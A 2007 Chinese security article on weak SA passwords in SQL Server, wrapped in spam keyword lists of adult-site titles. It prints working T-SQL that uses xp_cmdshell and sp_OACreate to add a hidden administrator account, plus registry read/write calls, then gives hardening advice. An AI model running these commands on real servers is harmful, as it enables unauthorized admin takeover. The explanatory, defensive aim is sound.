国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

系統(tǒng)安全之SA弱口令帶來的安全隱患
2007-01-18   

存在Microsoft SQL Server SA弱口令漏洞的計算機一直是網(wǎng)絡攻擊者青睞的對象之一,通過這個漏洞,可以輕易的得到服務器的管理權(quán)限,從而威脅網(wǎng)絡及數(shù)據(jù)的安全。作為網(wǎng)絡管理員,我們可不能不聞不問,一定要弄清楚這其中的起因、經(jīng)過和結(jié)果,才能有的放矢,做到更為有效的防范,下面我就詳細的向大家介紹一下。

Microsoft SQLServer是一個C/S模式的強大的關系型數(shù)據(jù)庫管理系統(tǒng),應用領域十分廣泛,從網(wǎng)站后臺數(shù)據(jù)庫到一些MIS(管理信息系統(tǒng))到處都可以看到它的身影。網(wǎng)絡中利用Microsoft SQLServer SA弱口令入侵的核心內(nèi)容就是利用Microsoft SQLServer中的存儲過程獲得系統(tǒng)管理員權(quán)限,那到底什么是存儲過程?

存儲過程是存儲在SQLServer中的預先寫好的SQL語句集合,其中危險性最高的擴展存儲過程就是xp_cmdshell了,它可以執(zhí)行操作系統(tǒng)的任何指令,而SA是Microsoft SQLServer的管理員帳號,擁有最高權(quán)限,它可以執(zhí)行擴展存儲過程,并獲得返回值,比如執(zhí)行:

exec master..xp_cmdshell 'net user test 1234 /add'和exec master..xp_cmdshell 'net 
localgroup administrators test /add'


這樣對方的系統(tǒng)就被添加了一個用戶名為test,密碼為1234,有管理員權(quán)限的用戶,如圖一所示。

498)this.style.width=498;">

現(xiàn)在你應該明白為什么得到SA密碼,就可以得到系統(tǒng)的最高權(quán)限了吧。而往往不少網(wǎng)絡管理員不清楚這個情況,為自己的SA用戶起了一些諸如1234,4321等簡單的密碼,甚至根本就不設置密碼,這樣網(wǎng)絡入侵者就可以利用一些黑客工具很輕松的掃描到SA的密碼,進而控制計算機。

除了xp_cmdshell,還有一些存儲過程也有可能會被入侵者利用到:

1、xp_regread(這個擴展存儲過程可以讀取注冊表指定的鍵里指定的值),使用方法(得到機器名):

DECLARE @test varchar(50)
EXEC master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',
@key='system\controlset001\control\computername\computername',
@value_name='computername',
@value=@test OUTPUT
SELECT @test

2、xp_regwrite(這個擴展存儲過程可以寫入注冊表指定的鍵里指定的值),使用方法(在鍵HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue寫入bbb):

EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\aaa',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'


如果被入侵的計算機的administrator用戶可以瀏覽注冊表中的HKEY_LOCAL_MACHINE\SAM\SAM\信息,那使用xp_regread、xp_regwrite這兩個存儲過程可以實現(xiàn)克隆administrator用戶,得到管理員權(quán)限。xp_regdeletekey、xp_regdeletevalue也會對系統(tǒng)帶來安全隱患。

3、OLE相關的一系列存儲過程,這系列的存儲過程有sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod,sp_OASetProperty,sp_OAStop,使用方法:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT 
EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user test 
1234 /add'--


這樣對方系統(tǒng)增加了一個用戶名為test,密碼為1234的用戶,再執(zhí)行:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT 
EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net localgroup 
administrators test /add '--


用戶test,被加入管理員組。

解決辦法:給SA起個足夠復雜的密碼,使網(wǎng)絡攻擊者很難破解出來。為了保險,我們還要到在SQLServer的查詢分析器中使用存儲過程sp_dropextendedproc刪除xp_cmdshell等存儲過程,需要時再使用sp_addextendedproc恢復即可,具體操作可以在SQLServer中查詢sp_dropextendedproc和sp_addextendedproc的使用幫助,需要注意一點的是刪除OLE相關系列的存儲過程,可能會造成企業(yè)管理器中的某些功能無法使用,這里筆者不建議刪除。

既然我們知道了SP_OACREATE的使用方法,那我們就可以到\WINNT\system32下找到cmd.exe,net.exe和net1.exe這三個文件,在“屬性”—“安全”中把可以對他們訪問的用戶全部刪除掉,這樣就無法使用SP_OACREATE來增加系統(tǒng)用戶了,在我們需要訪問這些文件的時候再加上訪問用戶就可以了。

熱詞搜索:

上一篇:如何徹底刪除Windows 2000默認共享
下一篇:系統(tǒng)安全之單機雙操作系統(tǒng)殺毒的技巧

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
日韩免费观看2025年上映的电影| 欧美激情一区二区三区不卡| 精品国产一区二区三区久久影院| 舔着乳尖日韩一区| 在线电影欧美成精品| 国产日产欧美一区| www.性欧美| 亚洲精品乱码久久久久久久久| 欧美亚洲综合网| 天堂蜜桃一区二区三区| 91精品国产综合久久久久久久| 美女在线一区二区| 国产日韩v精品一区二区| 白白色 亚洲乱淫| 天天操天天干天天综合网| 日韩欧美国产一区二区三区| 成人免费看片app下载| 亚洲乱码国产乱码精品精的特点 | 欧美一二三区在线观看| 国产一区二区三区免费在线观看| 中文字幕中文字幕一区| 欧美日韩视频在线一区二区| 琪琪久久久久日韩精品| 国产精品久久久久久久久晋中| 欧美日本一道本在线视频| 国产精品系列在线观看| 亚洲自拍与偷拍| 国产午夜亚洲精品不卡| 欧美日韩一级视频| 国产成人av电影在线| 日韩二区三区四区| 亚洲精品免费播放| 欧美国产成人精品| 精品日韩在线一区| 欧美视频一二三区| 91在线视频免费91| 国产成人综合亚洲91猫咪| 日韩av中文字幕一区二区| 亚洲男人天堂av网| 欧美国产97人人爽人人喊| 欧美sm美女调教| 日韩区在线观看| 欧美卡1卡2卡| 欧美久久久久免费| 欧美三级日韩三级国产三级| 91福利精品视频| 一本久久精品一区二区| aaa亚洲精品一二三区| 国产suv精品一区二区6| 国产乱码精品1区2区3区| 九色综合国产一区二区三区| 日本成人在线不卡视频| 五月天久久比比资源色| 亚洲bt欧美bt精品| 日日夜夜精品视频免费| 美女一区二区三区| 国产一区亚洲一区| 成人黄色小视频| 色综合中文字幕| 91福利在线导航| 欧美精品 日韩| 日韩欧美高清在线| 欧美精品一区二区三区一线天视频| 欧美一级日韩一级| 日韩欧美国产成人一区二区| 日韩精品专区在线影院观看| 91精品国产综合久久福利| 欧美午夜寂寞影院| 在线看一区二区| 欧美亚一区二区| 在线观看免费一区| 精品久久国产老人久久综合| 欧美日韩dvd在线观看| 色综合视频在线观看| 99精品欧美一区| 色国产综合视频| 欧美亚洲一区二区在线| 99久久夜色精品国产网站| 日本道色综合久久| 欧美怡红院视频| 91精品久久久久久久91蜜桃| 欧美老肥妇做.爰bbww| 51久久夜色精品国产麻豆| 欧美精品第1页| 日韩欧美久久久| 欧美精品一区二区在线播放| 久久免费的精品国产v∧| 国产美女久久久久| 白白色 亚洲乱淫| 在线观看日韩一区| 欧美久久久久久蜜桃| 日韩欧美www| 中文字幕精品在线不卡| 亚洲欧美怡红院| 国产精品高潮呻吟久久| 综合精品久久久| 亚洲电影一区二区| 麻豆国产一区二区| 成人免费视频app| 欧美日精品一区视频| 日韩精品一区二区三区四区| 日韩美一区二区三区| 亚洲免费观看在线观看| 日韩精品五月天| 国产激情视频一区二区三区欧美| 不卡的电影网站| 欧美久久婷婷综合色| 欧美精彩视频一区二区三区| 亚洲黄色录像片| 免费亚洲电影在线| 欧美探花视频资源| 国产视频视频一区| 亚洲蜜臀av乱码久久精品| 天天av天天翘天天综合网| 国产精品自拍一区| 欧美日高清视频| 成人欧美一区二区三区白人| 国产一区欧美二区| 91麻豆精品91久久久久久清纯| 久久精品一区二区| 五月婷婷色综合| 日本精品视频一区二区| 久久综合国产精品| 五月天网站亚洲| 欧美三级在线播放| 国产精品福利一区| 精品在线播放午夜| 欧美亚洲动漫精品| 亚洲人一二三区| 国产成人精品亚洲777人妖| 欧美日韩激情一区| 丝袜亚洲另类欧美综合| 色哟哟精品一区| 欧美激情综合在线| 国产毛片精品国产一区二区三区| 欧美日韩国产美| 亚洲综合一二三区| a级高清视频欧美日韩| 亚洲欧美日韩一区二区| 国产不卡免费视频| 久久久久9999亚洲精品| 奇米一区二区三区av| 欧美日韩一本到| 一区二区三区欧美激情| 成人午夜看片网址| 亚洲欧美区自拍先锋| 成人av在线资源| 欧美国产1区2区| www.欧美色图| 国产精品久线观看视频| 国产黄色91视频| 成人激情免费网站| 中文字幕一区二区三区四区不卡| 国产激情一区二区三区桃花岛亚洲| 欧美一级搡bbbb搡bbbb| 青青青伊人色综合久久| 欧美一区二区不卡视频| 一区二区三区在线免费播放| 91福利在线免费观看| 亚洲精品一二三四区| 欧美综合在线视频| 图片区小说区国产精品视频| 欧美精品第1页| 蜜桃传媒麻豆第一区在线观看| 欧美一区二区三区系列电影| 麻豆专区一区二区三区四区五区| 日韩一区国产二区欧美三区| 国产美女在线观看一区| 国产精品国产三级国产aⅴ入口 | 亚洲影院免费观看| 欧洲中文字幕精品| 蜜桃视频一区二区| 国产蜜臀av在线一区二区三区| 不卡一区二区三区四区| 免费欧美高清视频| 国产欧美1区2区3区| 色综合久久九月婷婷色综合| 亚洲国产一区二区视频| 日韩欧美一级二级| 91小视频在线观看| 国产v日产∨综合v精品视频| 亚洲精品你懂的| 日韩精品在线网站| 国产99久久精品| 亚洲成人精品一区二区| 欧美一区二区性放荡片| 色婷婷国产精品| 麻豆国产精品视频| 亚洲三级在线看| 欧美一区二区在线看| av男人天堂一区| 日韩avvvv在线播放| 亚洲一级电影视频| 国产欧美综合在线观看第十页| 欧美三级在线视频| 91在线观看地址| 国产在线播放一区二区三区| 一区二区三区色| 国产欧美一区二区精品久导航| 色老头久久综合|